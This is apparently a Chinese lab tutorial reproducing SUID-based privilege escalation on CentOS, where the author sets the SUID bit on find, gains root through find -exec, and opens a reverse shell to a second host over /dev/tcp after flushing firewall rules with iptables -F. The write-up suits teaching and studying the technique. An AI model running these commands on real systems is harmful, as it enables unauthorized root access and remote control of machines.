centos利用find提权反弹shell

需要说明的是利用find命令进行提权的方式已经不存在了,因为Linux默认不会为find命令授予suid权限,这里只是刻意的制造出了一种存在提权的环境

首先我们先介绍一下find命令,find命令主要用来在Linux中查找文件使用,它可以进行最基础的打印操作,还可以根据文件的名称、类型、事假戳、大小、权限等来查找指定的文件。

利用find反弹shell实现提权主要依靠的就是find命令如果有suid的权限,那么在执行find命令的一瞬间会拥有root权限,又因为find命令可以使用执行的操作,所以有很大的危害。

那么我们现在就复现一下:

(1)首先可以查看一下find命令的权限

bash 复制代码
ls -al /usr/bin/find

可以看到并没有suid(s)权限

(2)那么我现在手动的为find授予suid的权限

bash 复制代码
chmod  u+s /usr/bin/find

我们再查看find的权限就会发现它已经有了s权限

(3)因为我现在还是在root用户下,始终是root权限,无法观察find命令提权的过程,我现在切换到一个普通的用户下:

bash 复制代码
su user1

(4)那么现在就可以测试一下find命令执行时会不会提升到root权限

bash 复制代码
find /etc/passwd -exec whoami \;

可以看到这里和我设想的一样,在find命令执行的一瞬间是root权限

(5)那么这是我在另一台centos对12345端口进行监听

bash 复制代码
nc -lvvp 12345

(5)这时我尝试在centos1上执行操作,尝试进行反弹shell

bash 复制代码
find  /etc/passwd -exec bash -ip >&/dev/tcp/192.168.159.201/12345 0>&1 \;

可以看到并没有成功,难道因为我们没有到192.168.159.201的路由吗,我们可是一个网段呀,那我就用ping命令看看

很明显可以ping通呀,那为什么在尝试执行时会报错说没有路由呢

(6)我想会不会是因为防火墙的原因,于是我在两台主机上都清除了防火墙的规则

bash 复制代码
iptables -F

(7)然后再次尝试

可以看到centos1成功的利用find的这样一个漏洞反弹到了centos2的shell

(8)我们可以查看一下ip地址看看是否为centos1

可以看到这就是我的centos1设备的ip地址

到这里使用find来实现反弹shell的漏洞就复现完成了

注:给find增加suid增加只是为了实验,记着做完实验后去除find的suid权限

bash 复制代码
chmod u-s /usr/bin/find
相关推荐
中云DDoS CC防护蔡蔡21 分钟前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
HPC_fac130520678161 小时前
以科学计算为切入点:剖析英伟达服务器过热难题
服务器·人工智能·深度学习·机器学习·计算机视觉·数据挖掘·gpu算力
yaoxin5211232 小时前
第二十七章 TCP 客户端 服务器通信 - 连接管理
服务器·网络·tcp/ip
内核程序员kevin2 小时前
TCP Listen 队列详解与优化指南
linux·网络·tcp/ip
EasyNVR4 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash6 小时前
【D01】网络安全概论
网络·安全·web安全·php
sinat_384241097 小时前
使用 npm 安装 Electron 作为开发依赖
服务器
朝九晚五ฺ7 小时前
【Linux探索学习】第十四弹——进程优先级:深入理解操作系统中的进程优先级
linux·运维·学习
自由的dream7 小时前
Linux的桌面
linux
xiaozhiwise7 小时前
Makefile 之 自动化变量
linux